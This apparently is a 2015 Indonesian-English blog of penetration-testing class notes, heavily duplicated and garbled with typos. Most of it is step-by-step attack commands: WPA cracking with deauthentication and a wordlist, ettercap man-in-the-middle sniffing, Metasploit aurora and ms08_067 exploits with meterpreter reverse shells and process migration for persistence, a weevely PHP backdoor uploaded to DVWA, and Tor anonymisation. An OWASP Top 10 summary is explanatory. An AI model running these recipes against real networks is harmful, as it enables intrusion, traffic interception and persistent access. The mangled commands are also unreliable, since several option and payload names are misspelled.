1.Open a terminal and run
# airmon-ng start wlan0 enter
if we ifconfig will display mon0
(Buka terminal dan jalankan
#airmon-ng start wlan0 enter
jika kita ifconfig maka akan muncul mon0)
2.type
# airodump-ng mon0 enter
it will display the network that is being run in accordance with each channels
(Ketik
#airodump-ng mon0 enter
maka akan muncul jaringan yang sedang berjalan sesuai dengan channel
masing-masing)
3.Control C dan ketik
#airodump-ng -c5 --bssid 94:77:2B:FD:7C:EF -w/tmp/scorpion mon0
4.Buka terminal baru
#aireplay-ng -0 200 -a 94:77:2B:FD:7C:EF -e scorpion --ignore-negative-one mon0 enter control C.
5.Kembali ke terminal 1
#airodump-ng -c5 --bssid 94:77:2B:FD:7C:EF -w/tmp/scorpiondump mon0
6.Kontrol C
#cd /tmp/
#ls
7.# aircrack-ng scorpiondump-01.cap -w /usr/share/wordlists/metasploit/unix_passwords.txt
maka password akan ditemukan.
Selanjutnya kita menseting PC kita sebagi Router sehingga saat orang lain yang mengakses jaringan tsb datanya terkirim di PC kita terlebih dahulu.
langkah selanjutnya buka halaman Etter Cat di terminal baru.
1.#ettercap -G enter
klik Sniff---Unified sniffing selanjutnya ketik Wlan0 dan klik ok
2.klik Hosts---Host list
3.Pilih IP: 192.168.1.1 (karena IP ini adalah akses poin). Jadi kita tidak memilih IP orang lain agar orang lain tersebut tidak off.
4.Klik pada IP 192.168.1.1 dan klik add to target 1
5.Klik Mitm---Sniff remote connection klik ok
maka proses scan akan berjalan kemudian klik sirip warna hijau utk men capture data kemudian stop dan save file
6.Pilih Mitm---stop mitm attack agar proses berhenti tanpa mematikan PC yg sedang berjalan.
Senin, 31 Agustus 2015
Jumat, 28 Agustus 2015
How to combain client side attack with beef
1. Open tools Beef in kali linux applicatio.
2. Click link Here in initial appearence of Beef.
3. Open Terminal to make metasploit for one of windows application namely ms10_002_aurora.
4. #msfconsole
>use exploit/windows/browser/ms10_002_aurora
>show option
>set RVSHOST 192.168.56.1
>set RVSPORT 8080
>set URIPATH meremmelek.mp4
>set PAYLOAD windows/meterpreter/reserve_tcp_dns
5. show option
6. >set LHOST 192.168.56.1
>exploit
7. We will get the address of url: http://192.168.56.1:8080/merammelek.mp4 which browse by target
8. saat alamat url: http://192.168.56.1:8080/merammelek.mp4 di browse oleh target makan meterpreter akan terbuka(posisi kita sudah di sistem target)
9.>session l
>session -i 1
meterpreter>
10. Kemudian buka halaman beef, klik 2x IP yang terkonek pada online browser kemudian pilih modul direck browser maka akan muncul kotak yang akan kita masukan alamat url: http://192.168.56.1:8080/merammelek.mp4 selanjutnya klik execute.
11. Kemudian segera pindah ke terminal dan ketik
>ps ( muncul list system sasaran yg sedang dalam berfungsi )
>migrate ( pilih angka PID salah satu list tadi )
tujuan nya adalah agar saat target mematikan system nya kemudian di hidupkan kembali, posisi kita masih tetap berada di system target tsb.
12. Pada posisi meterpreter berarti kita sudah dapat mengexploit system target. salah satunya perintah :
meterprete>run post/windows/gather/enum_hostfile enter
artinya : kita menjalankan perintah untuk mendownload file
2. Click link Here in initial appearence of Beef.
3. Open Terminal to make metasploit for one of windows application namely ms10_002_aurora.
4. #msfconsole
>use exploit/windows/browser/ms10_002_aurora
>show option
>set RVSHOST 192.168.56.1
>set RVSPORT 8080
>set URIPATH meremmelek.mp4
>set PAYLOAD windows/meterpreter/reserve_tcp_dns
5. show option
6. >set LHOST 192.168.56.1
>exploit
7. We will get the address of url: http://192.168.56.1:8080/merammelek.mp4 which browse by target
8. saat alamat url: http://192.168.56.1:8080/merammelek.mp4 di browse oleh target makan meterpreter akan terbuka(posisi kita sudah di sistem target)
9.>session l
>session -i 1
meterpreter>
10. Kemudian buka halaman beef, klik 2x IP yang terkonek pada online browser kemudian pilih modul direck browser maka akan muncul kotak yang akan kita masukan alamat url: http://192.168.56.1:8080/merammelek.mp4 selanjutnya klik execute.
11. Kemudian segera pindah ke terminal dan ketik
>ps ( muncul list system sasaran yg sedang dalam berfungsi )
>migrate ( pilih angka PID salah satu list tadi )
tujuan nya adalah agar saat target mematikan system nya kemudian di hidupkan kembali, posisi kita masih tetap berada di system target tsb.
12. Pada posisi meterpreter berarti kita sudah dapat mengexploit system target. salah satunya perintah :
meterprete>run post/windows/gather/enum_hostfile enter
artinya : kita menjalankan perintah untuk mendownload file
Kamis, 27 Agustus 2015
Steps of Client Side Attack
1. Buka terminal pada Kali linux
2. Ketik #msfconsole
3. > use exploit/windows/browser/ (tab 2x )
4. Ketik Y ( yes )
5.>use exploit/windows/browser/ms10_002_aurora enter
6.>show options
7.>set SRVHOST 192.168.1.107 ( ip wlan0/attacker )
8.>set SRVPORT 80
9.>set URIPATH siantarman
9.>set LHOST 192.168.1.107 ( ip wlan0/attacker )
10.>show options
11.>exploit enter
12.>ketik alamat URL: http://192.168.1.107:80/siantarman
browse di windows enternet explorer
2. Ketik #msfconsole
3. > use exploit/windows/browser/ (tab 2x )
4. Ketik Y ( yes )
5.>use exploit/windows/browser/ms10_002_aurora enter
6.>show options
7.>set SRVHOST 192.168.1.107 ( ip wlan0/attacker )
8.>set SRVPORT 80
9.>set URIPATH siantarman
9.>set LHOST 192.168.1.107 ( ip wlan0/attacker )
10.>show options
11.>exploit enter
12.>ketik alamat URL: http://192.168.1.107:80/siantarman
browse di windows enternet explorer
Rabu, 26 Agustus 2015
Discribtion of SET ( social engineering toolkit )
SET / Social Engineering Toolkit :
Social engineering is the act of manipulating a person's mind to get the expected goals. Soc-eng is a generic term and in the daily life of each person doing this, but the use of soc-Eng in the world of hacking and Pen-Test be a little different. The main function than-Eng Soc Hacking in the world is to get information, get access permissions and many other things as well
Social engineering is the act of manipulating a person's mind to get the expected goals. Soc-eng is a generic term and in the daily life of each person doing this, but the use of soc-Eng in the world of hacking and Pen-Test be a little different. The main function than-Eng Soc Hacking in the world is to get information, get access permissions and many other things as well
Minggu, 23 Agustus 2015
VPS (Virtual Private Server)
1. VPS diartikan sebagai sebuah metode untuk mempartisi atau
membagi sumber daya / resource sebuah server menjadi beberapa server
virtual. Server virtual tersebut memiliki kemampuan menjalankan
operating system sendiri seperti layaknya sebuah server. Bahkan Anda
dapat me-reboot sebuah server virtual secara terpisah (tidak harus
mem-reboot server utama).Dalam sebuah VPS, resource server yang
alokasikan adalah meliputi CPU Core, CPU Usage, RAM, dan Storage atau
ruang penyimpananan.
VPS interpreted as a method to partition or divide the resource / resource a server into multiple virtual servers. The virtual servers have the capability of running its own operating system like a server. In fact you can reboot a virtual server separately (not necessarily mem-reboot the primary server).
In a VPS, server resources are allocated is covering CPU Core, CPU Usage, RAM, and storage space.
VPS interpreted as a method to partition or divide the resource / resource a server into multiple virtual servers. The virtual servers have the capability of running its own operating system like a server. In fact you can reboot a virtual server separately (not necessarily mem-reboot the primary server).
In a VPS, server resources are allocated is covering CPU Core, CPU Usage, RAM, and storage space.
Use of VPN (Virtual Private Network) in our system as a network security device when we execute access
1. Brows: vpngate and copy the adress of the software.
2. This VPN is Free and choose the one of opened VPS and then click in to get the address.
3. Type: openvpn --config vpngate_vpn932558229.opengw.net_udp_1195.ovpn enter. And VPN has Succesed to Complicate.
2. This VPN is Free and choose the one of opened VPS and then click in to get the address.
3. Type: openvpn --config vpngate_vpn932558229.opengw.net_udp_1195.ovpn enter. And VPN has Succesed to Complicate.
Use of TOR in our system as a network security device when we execute access
1. Format TOR in your system with command :
# /etc/init.d/tor start enter
2. Type Proxychains that TOR has been used in our system for securities.
# proxychains enter
3. Format your Proxy position and browse ipchicken to get our new ID shadow.
# /etc/init.d/tor start enter
2. Type Proxychains that TOR has been used in our system for securities.
# proxychains enter
3. Format your Proxy position and browse ipchicken to get our new ID shadow.
4. To find out if we've camouflaged position when we open a web.
Sabtu, 22 Agustus 2015
How to change application web from user bias ($) to user/root (#)
1. Buka Virtualbox dan Metasploitable.
Visualisasi ini menggambarkan Metasploitable yang sudah terinstal di dalam Virtualbox sebagai target. Maka sebelum masuk ke langkah berikutnya perlu digaris bawahi bahwa kegiatan sebelumnta yg kita laksanakan adalah tahap IG s.d VA dimana informasi dari tahap tersebut dapat kita manfaatkan sebagai salah satu cara untuk pengesekan melalui Apload pada DVWA.
2. Setelah tahap tersebut kita dapat melaksanakan Exploitasi.
3. Kita membuat Backdoor pada system kita sendiri terlebih dahulu.
dengan format: Weefely generate 333 /root/Backdoor.php
4. Cek apakah Backdoor tersebut sudah ada dalam Folder kita dengan: ls
5. Sebelum kita membuat Backdoor pada target kita terlebih dahulu kita masuk ke halan DVWA dengan cara browser IP Target/DVWA
6. Setelah terbuka jangan lupa rubah posisi dari High ke Low.
7. Klik Upload, masuk ke menu browse kemudian browse data php tersebut kemudian Upload. Maka kita akan mendapatkan alamt url yang akan kita gunakan untuk membuat Bacdoor pada Target dengan format: Weevely http://192.168.56.101/dvwa/hackable/uploads/Backdoor.php 4444 enter
8. Untuk melihat apakah sudah ada Backdoor kita keti: ls
1. Open Virtualbox and Metasploitable.This visualization illustrates Metasploitable already installed in Virtualbox as a target. So before going to the next step needs to be underlined that the activities that we carry out sebelumnta is sd VA IG stage where the information of the stage can be utilized as a way to pengesekan through apload on DVWA.2. After the stage we can implement Exploitation.3. We create our own backdoor on the system first.format: Weefely generate 333 /root/Backdoor.php4. Check whether the Backdoor already exists in our Folder with: ls5. Before we create a backdoor on our targets we first went into halan DVWA manner Target IP browser / DVWA6. Once opened do not forget to change the position from High to Low.7. Click Upload, go to browse then browse the data is then uploads php. Then we will get alamt url that we will use to make Bacdoor on target with the format: 4444 http://192.168.56.101/dvwa/hackable/uploads/Backdoor.php Weevely enter8. To see whether there Backdoor we keti: ls
Visualisasi ini menggambarkan Metasploitable yang sudah terinstal di dalam Virtualbox sebagai target. Maka sebelum masuk ke langkah berikutnya perlu digaris bawahi bahwa kegiatan sebelumnta yg kita laksanakan adalah tahap IG s.d VA dimana informasi dari tahap tersebut dapat kita manfaatkan sebagai salah satu cara untuk pengesekan melalui Apload pada DVWA.
2. Setelah tahap tersebut kita dapat melaksanakan Exploitasi.
3. Kita membuat Backdoor pada system kita sendiri terlebih dahulu.
dengan format: Weefely generate 333 /root/Backdoor.php
4. Cek apakah Backdoor tersebut sudah ada dalam Folder kita dengan: ls
5. Sebelum kita membuat Backdoor pada target kita terlebih dahulu kita masuk ke halan DVWA dengan cara browser IP Target/DVWA
6. Setelah terbuka jangan lupa rubah posisi dari High ke Low.
7. Klik Upload, masuk ke menu browse kemudian browse data php tersebut kemudian Upload. Maka kita akan mendapatkan alamt url yang akan kita gunakan untuk membuat Bacdoor pada Target dengan format: Weevely http://192.168.56.101/dvwa/hackable/uploads/Backdoor.php 4444 enter
8. Untuk melihat apakah sudah ada Backdoor kita keti: ls
1. Open Virtualbox and Metasploitable.This visualization illustrates Metasploitable already installed in Virtualbox as a target. So before going to the next step needs to be underlined that the activities that we carry out sebelumnta is sd VA IG stage where the information of the stage can be utilized as a way to pengesekan through apload on DVWA.2. After the stage we can implement Exploitation.3. We create our own backdoor on the system first.format: Weefely generate 333 /root/Backdoor.php4. Check whether the Backdoor already exists in our Folder with: ls5. Before we create a backdoor on our targets we first went into halan DVWA manner Target IP browser / DVWA6. Once opened do not forget to change the position from High to Low.7. Click Upload, go to browse then browse the data is then uploads php. Then we will get alamt url that we will use to make Bacdoor on target with the format: 4444 http://192.168.56.101/dvwa/hackable/uploads/Backdoor.php Weevely enter8. To see whether there Backdoor we keti: ls

Jumat, 21 Agustus 2015
The process of entering data to other servers via the Upload process in DVWA
1.Buka terminal pada Virtualbox dan terminal Ubuntu
koneksikan antar Virualbox dengan Ubuntu dgn cara Ping.
2.Ketik pada terminal Virtualbox: weevely 1234 tmp.ph enter
3.Browsing IP target: 192.168.56.100/dvwa enter sehingga keluar tampilan awal DVWA. Masukan user name dan jangan lupa merubah posisi High menjadi Low.
4.Pilih menu Upload dan klik Browser maka akan menuju ke menu file tmp.php dan Upload. Copy alamat hasil upload tadi dan browser. hasil browser tersebut akan memunculkan alamat url, copy dan pindah ke terminal linux.
koneksikan antar Virualbox dengan Ubuntu dgn cara Ping.
2.Ketik pada terminal Virtualbox: weevely 1234 tmp.ph enter
3.Browsing IP target: 192.168.56.100/dvwa enter sehingga keluar tampilan awal DVWA. Masukan user name dan jangan lupa merubah posisi High menjadi Low.
4.Pilih menu Upload dan klik Browser maka akan menuju ke menu file tmp.php dan Upload. Copy alamat hasil upload tadi dan browser. hasil browser tersebut akan memunculkan alamat url, copy dan pindah ke terminal linux.
Kamis, 20 Agustus 2015
Process of CSRF
1. Open the terminal. looking for IP Lan wit ifconfig
and get the Wlan0 for browsing.
2. Browsing with : http://192.168.1 after that always change High to Low.
3. Open the CSRF space that we can see the box which changed of the password.
4. This cause is when there was a probability attacker to change the item in a Web side.
and get the Wlan0 for browsing.
3. Open the CSRF space that we can see the box which changed of the password.
4. This cause is when there was a probability attacker to change the item in a Web side.
The process Brute Force
Rabu, 19 Agustus 2015
OWASP ( Open Web Aplication Security Project )
OWASP ( Open Web Aplication Security Project )
adalah organisasi yg mensosialisasikan kesadaran akan keamanan suatu aplikasi.
1. Web Goat
2. Web Scrab
3. OWASP Top 10
3.1.Cross Site Scripting (XSS), para attackers memanfaatkan web aplikasi untuk dijadikan sebagai mekanisme yang menghubungkan serangan pada web browser penggunanya. Seperti yang kita tahu web browser dapat menjalankan code yang dikirim dari web site server seperti javascript atau flash sehingga memungkinkan untuk di attack seperti dengan mengirimkan isinya ke pemakai lain. Kata kuncinya adalah jangan membiarkan lubang untuk attacker mencuri isi web yang masih aktif karena saat pengguna web aplikasi dapat memasukkan data dan mengirimkan ke web browser tanpa harus melakukan validasi dan encoding terhadap isi data tersebut, sehingga mengakibatkan penyerang dapat menjalankan potongan kode script miliknya di browser target, dan memungkinkan untuk mencuri user session milik target, bahkan sampai menciptakan Worm.
3.2. Injection Flows, aplikasi web dapat melewatkan informasi dari pengguna ke sistem lain ataupun ke system operasi lokal. Jika penyusup dapat melewatkan perintah yang tidak diantisipasi oleh aplikasi web maka dia mungkin dapat masuk dalam sistem operasi lokal. Secara umum penggunaan parameter atau perintah dalam bentuk SQL jangan dilakukan dalam parameter konstan sehingga dapat diketahui oleh attackers. Karena celah injeksi umumnya injeksi terhadap SQL (database) dari suatu aplikasi web. Hal ini mungkin terjadi apabila pengguna memasukkan data sebagai bagian dari perintah (query) yang menipu interpreter untuk menjalankan perintah tersebut atau merubah suatu data.
Key Points: – Use extreme care when invoking an interpreter, -Use limited interfaces where possible (PreparedStatement), – Check return values
3.3. Malicious File Execution, Celah ini mengakibatkan penyerang dapat secara remote membuat file yang berisi kode dan data untuk di eksekusi, salah satunya adalah Remote file inclusion (RFI).
3.4. Insecure Direct Object Reference, Adalah suatu celah yang terjadi saat pembuat aplikasi web merekspos referensi internal penggunaan objek, seperti file,direktori, database record, dll
3.5. Cross Site Request Forgery (CSRF), Celah ini akan memaksa browser target yang sudah log-in untuk mengirimkan “pre-authenticated request” terhadap aplikasi web yang diketahui memiliki celah, dan memaksa browser target untuk melakukan hal yang menguntungkan penyerang.
3.6. Information Leakage and Improper Error Handling, penyerang menggunakan informasi yang didapatkan dari celah yang diakibatkan oleh informasi yang diberikan oleh web aplikasi seperti pesan kesalahan (error) serta konfigurasi yang bisa di lihat. Kondisi error yang tidak ditangani secara benar dapat digunakan untuk memperoleh informasi dari sistem atau bahkan dapat membuat suatu sistem “crash”. Jadi penanganan masalah harus dilakukan dengan benar sehingga tidak meimbulkan efek lainnya yang membahayakan seperti Out of memory, too many users, timeout, db failure, authentication failure, access control failure, bad input. Kuncinya adalah perancangan skema penanganan errors yang benar dan juga konfigurasi server yang tepat.
3.7. Broken Authentication and Session Management, account dan token session tidak terproteksi dengan baik. Celah ini merupakan akibat buruknya penanganan proses otentikasi dan manajemen sesi, sehingga penyerang bisa mendapatkan password, atau key yang di gunakan untuk otentikasi.
Key Points: – Keep credentials secret at all times, – Use only the random sessionid provided by your environment
3.8. Insecure Cryptographic Storage, aplikasi web umumnya jarang menggunakan fungsi kriptografi untuk melindungi data penting yang dimiliki karena memiliki kelemahan. Pada umumnya fungsi tersebut dan juga bagian kode untuk mengintegrasikannya sulit untuk dituliskan secara benar, dan ini menghasilkan proteksi yang lemah. Sebaiknya menggunakan algoritma yang mudah digunakan dan terintegrasi dengan baik.
Key Points: – Do not even think about inventing a new algorithm, – Be extremely careful storing keys, certs, and passwords, – Rethink whether you need to store the information, – Don’t store user passwords, – use a hash like SHA-256
3.9. Insecure Communications, sedikit sekali aplikasi web yang mengamankan jalur komunikasinya, hal inilah yang dimanfaatkan oleh penyerang sebagai celah untuk mendapatkan informasi berharga.
3.10. Failure to Restrict URL Access, Seringkali, aplikasi web hanya menghilangkan tampilan link (URL) dari pengguna yang tidak berhak, tetapi hal ini dengan sangat mudah dilewati dengan mengakses URL tersebut secara langsung.
adalah organisasi yg mensosialisasikan kesadaran akan keamanan suatu aplikasi.
1. Web Goat
2. Web Scrab
3. OWASP Top 10
3.1.Cross Site Scripting (XSS), para attackers memanfaatkan web aplikasi untuk dijadikan sebagai mekanisme yang menghubungkan serangan pada web browser penggunanya. Seperti yang kita tahu web browser dapat menjalankan code yang dikirim dari web site server seperti javascript atau flash sehingga memungkinkan untuk di attack seperti dengan mengirimkan isinya ke pemakai lain. Kata kuncinya adalah jangan membiarkan lubang untuk attacker mencuri isi web yang masih aktif karena saat pengguna web aplikasi dapat memasukkan data dan mengirimkan ke web browser tanpa harus melakukan validasi dan encoding terhadap isi data tersebut, sehingga mengakibatkan penyerang dapat menjalankan potongan kode script miliknya di browser target, dan memungkinkan untuk mencuri user session milik target, bahkan sampai menciptakan Worm.
3.2. Injection Flows, aplikasi web dapat melewatkan informasi dari pengguna ke sistem lain ataupun ke system operasi lokal. Jika penyusup dapat melewatkan perintah yang tidak diantisipasi oleh aplikasi web maka dia mungkin dapat masuk dalam sistem operasi lokal. Secara umum penggunaan parameter atau perintah dalam bentuk SQL jangan dilakukan dalam parameter konstan sehingga dapat diketahui oleh attackers. Karena celah injeksi umumnya injeksi terhadap SQL (database) dari suatu aplikasi web. Hal ini mungkin terjadi apabila pengguna memasukkan data sebagai bagian dari perintah (query) yang menipu interpreter untuk menjalankan perintah tersebut atau merubah suatu data.
Key Points: – Use extreme care when invoking an interpreter, -Use limited interfaces where possible (PreparedStatement), – Check return values
3.3. Malicious File Execution, Celah ini mengakibatkan penyerang dapat secara remote membuat file yang berisi kode dan data untuk di eksekusi, salah satunya adalah Remote file inclusion (RFI).
3.4. Insecure Direct Object Reference, Adalah suatu celah yang terjadi saat pembuat aplikasi web merekspos referensi internal penggunaan objek, seperti file,direktori, database record, dll
3.5. Cross Site Request Forgery (CSRF), Celah ini akan memaksa browser target yang sudah log-in untuk mengirimkan “pre-authenticated request” terhadap aplikasi web yang diketahui memiliki celah, dan memaksa browser target untuk melakukan hal yang menguntungkan penyerang.
3.6. Information Leakage and Improper Error Handling, penyerang menggunakan informasi yang didapatkan dari celah yang diakibatkan oleh informasi yang diberikan oleh web aplikasi seperti pesan kesalahan (error) serta konfigurasi yang bisa di lihat. Kondisi error yang tidak ditangani secara benar dapat digunakan untuk memperoleh informasi dari sistem atau bahkan dapat membuat suatu sistem “crash”. Jadi penanganan masalah harus dilakukan dengan benar sehingga tidak meimbulkan efek lainnya yang membahayakan seperti Out of memory, too many users, timeout, db failure, authentication failure, access control failure, bad input. Kuncinya adalah perancangan skema penanganan errors yang benar dan juga konfigurasi server yang tepat.
3.7. Broken Authentication and Session Management, account dan token session tidak terproteksi dengan baik. Celah ini merupakan akibat buruknya penanganan proses otentikasi dan manajemen sesi, sehingga penyerang bisa mendapatkan password, atau key yang di gunakan untuk otentikasi.
Key Points: – Keep credentials secret at all times, – Use only the random sessionid provided by your environment
3.8. Insecure Cryptographic Storage, aplikasi web umumnya jarang menggunakan fungsi kriptografi untuk melindungi data penting yang dimiliki karena memiliki kelemahan. Pada umumnya fungsi tersebut dan juga bagian kode untuk mengintegrasikannya sulit untuk dituliskan secara benar, dan ini menghasilkan proteksi yang lemah. Sebaiknya menggunakan algoritma yang mudah digunakan dan terintegrasi dengan baik.
Key Points: – Do not even think about inventing a new algorithm, – Be extremely careful storing keys, certs, and passwords, – Rethink whether you need to store the information, – Don’t store user passwords, – use a hash like SHA-256
3.9. Insecure Communications, sedikit sekali aplikasi web yang mengamankan jalur komunikasinya, hal inilah yang dimanfaatkan oleh penyerang sebagai celah untuk mendapatkan informasi berharga.
3.10. Failure to Restrict URL Access, Seringkali, aplikasi web hanya menghilangkan tampilan link (URL) dari pengguna yang tidak berhak, tetapi hal ini dengan sangat mudah dilewati dengan mengakses URL tersebut secara langsung.
Selasa, 18 Agustus 2015
How to upload a program from Linux to Windows
1. #ifconfig enter
2. #ping 192.186.56.101 enter
3. #nmap -A 192.168.56.1/24 enter
4. #msfconsole enter
5. >use exploit/windows/smb/ tab2x
6. >use exploit/windows/smb/ms08_067_netapi enter
7. >show options enter
8. >show options enter
9. >set RHOST 192.168.56.101 enter
10. >show options enter
11. >set PAYLOAD windows/meterpreter/ tab2x
12. >reserve_tcp enter
13. >show options enter
14. >ifconfig enter
15. > set LHOST 192.168.56.1 enter
16. >show options enter
17. >exploit enter
18. >search -f *txt enter
19. >upload /root/Home/ tab2x
2. #ping 192.186.56.101 enter
3. #nmap -A 192.168.56.1/24 enter
4. #msfconsole enter
5. >use exploit/windows/smb/ tab2x
6. >use exploit/windows/smb/ms08_067_netapi enter
7. >show options enter
8. >show options enter
9. >set RHOST 192.168.56.101 enter
10. >show options enter
11. >set PAYLOAD windows/meterpreter/ tab2x
12. >reserve_tcp enter
13. >show options enter
14. >ifconfig enter
15. > set LHOST 192.168.56.1 enter
16. >show options enter
17. >exploit enter
18. >search -f *txt enter
19. >upload /root/Home/ tab2x
Mencatat apa yang telah didapat hari ini
The process of Service Enumeration ( SE )
The ways how to lookingfor some Systems or Computer which same Connection with our system. The process :
1. netdiscover(space)-h enter
2. netdiscover(space)-r(space)IP enter
3. nmap(space)-A(space)IP enter
The scaning process Nessus in Vulnerability Accesment (VA) :
1. Open Nessus system with #/etc/init.d/nessud(space)start
2. Browser https ://localhost:8834
3. After Nessus system can opened the first is click new scan
4. Chose Basic Network Scan
5. Fill the name of data and fill the IP target
6. Klick Save as scan processing
TheProcess of Exploitation. Use Metasploit
1. msf> use exploit/windows/smb
2. msf> use exploit/windows/smg/ms08_067_netapi enter
3. klick show option enter
4. Set RHOST IP target enter
5. set PAYLOAD windows/meterpreter tab(2 x)
PAYLOAD consists of :
1. Bind-----(Host Targe-----Attacker
using at disturbing send from attacker for host target and the effect stop in terget. This way we use if the target in the same networking
2. Reserve-----(Host Target)-----Attacker
using at disturbing send from attacker for host target and then resending to attacker again. This way we use for the tagret in diffrent networking. This way is more advantage becaause we can know all the activities of target.
The ways how to lookingfor some Systems or Computer which same Connection with our system. The process :
1. netdiscover(space)-h enter
2. netdiscover(space)-r(space)IP enter
3. nmap(space)-A(space)IP enter
The scaning process Nessus in Vulnerability Accesment (VA) :
1. Open Nessus system with #/etc/init.d/nessud(space)start
2. Browser https ://localhost:8834
3. After Nessus system can opened the first is click new scan
4. Chose Basic Network Scan
5. Fill the name of data and fill the IP target
6. Klick Save as scan processing
TheProcess of Exploitation. Use Metasploit
1. msf> use exploit/windows/smb
2. msf> use exploit/windows/smg/ms08_067_netapi enter
3. klick show option enter
4. Set RHOST IP target enter
5. set PAYLOAD windows/meterpreter tab(2 x)
PAYLOAD consists of :
1. Bind-----(Host Targe-----Attacker
using at disturbing send from attacker for host target and the effect stop in terget. This way we use if the target in the same networking
2. Reserve-----(Host Target)-----Attacker
using at disturbing send from attacker for host target and then resending to attacker again. This way we use for the tagret in diffrent networking. This way is more advantage becaause we can know all the activities of target.
Istilah-istilah
1. Penetration ( penembusan/perembesan ): istilah dalam cyber yg artinya suatu proses untuk mengetahui apakah suatu system jaringan aman dari gangguan2 hacking dan apabila sudah didapatkan kerentanan gangguan tersebut dapat memberikan solusi
2. Gaining ( memperoleh keuntungan )
3. Exploit Repository ( hasil eksploit atw tempat penyimpanan hasil eksploi )
4. Metasploit Exploitation Framework
5. Privilege escalation ( peningkatan yang istimewa )
6. Backdooring with Netcat
7. Root
8. Terminal : halaman untuk mengerjakan bahasa linux
9. Attack Fundamental
2. Gaining ( memperoleh keuntungan )
3. Exploit Repository ( hasil eksploit atw tempat penyimpanan hasil eksploi )
4. Metasploit Exploitation Framework
5. Privilege escalation ( peningkatan yang istimewa )
6. Backdooring with Netcat
7. Root
8. Terminal : halaman untuk mengerjakan bahasa linux
9. Attack Fundamental
Senin, 17 Agustus 2015
Cara download Nessus( tools VA ) sebagai Scanner
1. Aktifkan jaringan internet dan masukan IP 192.168.1.108 (yg sudah disiapkan) kemudian enter kemudian dihalaman akan muncul 2 file/software ( Nessus-6.4.3-debian6.64 dan Nessus -6.4.3-debian6_i 386 )
2. Kemudian buka terminal. isi perintah uname -m dan enter untuk mencari data Nessus yang akan kita instal, kemudian buka folder download dgn ditambah .deb
3. Kembali ke terminal. Tulis cd_download dan enter. Selanjutnya pada terminal tulis #dpkg -i nessus-6.4.3-debian6_i 386
4. Setelah proses instalasi selesai masukan etc/inid/nessusd start enter. Maka akan muncul https://kali:8834/ kemudian kopi ke web/browser dan akan muncul halaman untuk registrasi. Pilih Free Registrasi dan isi dengan gmail yang aktif krn konfirmasi registrasi akan masuk ke gmail
5. Dari konfirmasi di gmail akan kita dapatkan code yang nantinya akan kita gunakan di terminal untuk proses download Nessus.
1. Your internet is on and then entry Ip 192.168.1.108 ( has already before ) and then enter in page there are 2 files/software ( ( Nessus-6.4.3-debian6.64 and Nessus -6.4.3-debian6_i 386 )
2. Open the Terminal. fill uname -m and enter to get nessus data which will instal and then open download folder and fill .deb
3. Back to Terminal. write cd_download and enter. and then in write in terminal #dpkg -i nessus-6.4.3-debian6_i386
4. After instalation has finished entry etc/inid.nessusd strat and will appear registration page. Chose free registration and fill with active gmail because we will get the confirm code.
5. From confirm in gmail we will get the code which use in terminal for download nessus processing
2. Kemudian buka terminal. isi perintah uname -m dan enter untuk mencari data Nessus yang akan kita instal, kemudian buka folder download dgn ditambah .deb
3. Kembali ke terminal. Tulis cd_download dan enter. Selanjutnya pada terminal tulis #dpkg -i nessus-6.4.3-debian6_i 386
4. Setelah proses instalasi selesai masukan etc/inid/nessusd start enter. Maka akan muncul https://kali:8834/ kemudian kopi ke web/browser dan akan muncul halaman untuk registrasi. Pilih Free Registrasi dan isi dengan gmail yang aktif krn konfirmasi registrasi akan masuk ke gmail
5. Dari konfirmasi di gmail akan kita dapatkan code yang nantinya akan kita gunakan di terminal untuk proses download Nessus.
1. Your internet is on and then entry Ip 192.168.1.108 ( has already before ) and then enter in page there are 2 files/software ( ( Nessus-6.4.3-debian6.64 and Nessus -6.4.3-debian6_i 386 )
2. Open the Terminal. fill uname -m and enter to get nessus data which will instal and then open download folder and fill .deb
3. Back to Terminal. write cd_download and enter. and then in write in terminal #dpkg -i nessus-6.4.3-debian6_i386
4. After instalation has finished entry etc/inid.nessusd strat and will appear registration page. Chose free registration and fill with active gmail because we will get the confirm code.
5. From confirm in gmail we will get the code which use in terminal for download nessus processing
Cara pengaktivasian antara Windows Xp/Target dengan Virtualbox
1. Buka Virtuallbox dan Aktifkan Windows Xp sebagai Target
2. Matikan Firewall pada Windows Xp agar kita dapat mengetahui apakah kita satu jaringan dengan target
3. Dapatkan IP Windows dgn cara Klik Start - Comman prom prom run - tulis cmd - .Akan muncul perintah masukan Ipconfig enter maka akan muncul IP Windows xp ( 192.168.56.101 )
4. Setelah mengetahu IP Windows xp kita buka terminal untuk mengetahui windows/target dalam satu jaringan dengan cara Klik #ping spasi IP Windows xp enter kemudian akan direspon.
1. OpenVirtualbox and Windows xp as a target
2. Swich off firewall in windows so we can know that we are in one networking with target
3. Get the IP windows with Klik Start - Comman prom run - write cmd . There is command for us to fill ipconfig enter ang will appear thw windows xp IP ( 192.168.56.101 )
4. After we known the windows IP we open the terminal to know that windows as target in one networking with click #ping space IP windows xp enter and will process
2. Matikan Firewall pada Windows Xp agar kita dapat mengetahui apakah kita satu jaringan dengan target
3. Dapatkan IP Windows dgn cara Klik Start - Comman prom prom run - tulis cmd - .Akan muncul perintah masukan Ipconfig enter maka akan muncul IP Windows xp ( 192.168.56.101 )
4. Setelah mengetahu IP Windows xp kita buka terminal untuk mengetahui windows/target dalam satu jaringan dengan cara Klik #ping spasi IP Windows xp enter kemudian akan direspon.
1. OpenVirtualbox and Windows xp as a target
2. Swich off firewall in windows so we can know that we are in one networking with target
3. Get the IP windows with Klik Start - Comman prom run - write cmd . There is command for us to fill ipconfig enter ang will appear thw windows xp IP ( 192.168.56.101 )
4. After we known the windows IP we open the terminal to know that windows as target in one networking with click #ping space IP windows xp enter and will process
visualisai cyber infiltaration
Istilah-istilah
1. IG ( Information gathering / pengumpulan Informasi )
adalah tahap mengumpulkan semua informasi atau semua yang berkaitan dengan objek/sas yang akan kita cari.
2. SE ( Service Enumeration / Pencacahan,pemilah-milahan)
adalah tahap pemetaan atau pemilah-milahan terhadap system suatu jaringan. Memilah sejauh mana tingkat kemanan system tersebut.
3. VA ( Vulnerability Acces / Tingkat kerentanan kena gangguan )
adalah tahap dimana kita mengetahui titik kerentanan suatu system untuk kita akses atau masuki.
4. Eksploitasi ( Menerobos Masuk )
adalah suatu cara menerobos masuk ke dalam system jaringan lain setelah kita melaksanakan tahap IG, SE, VA.
1. IG ( Information gathering / pengumpulan Informasi )
adalah tahap mengumpulkan semua informasi atau semua yang berkaitan dengan objek/sas yang akan kita cari.
2. SE ( Service Enumeration / Pencacahan,pemilah-milahan)
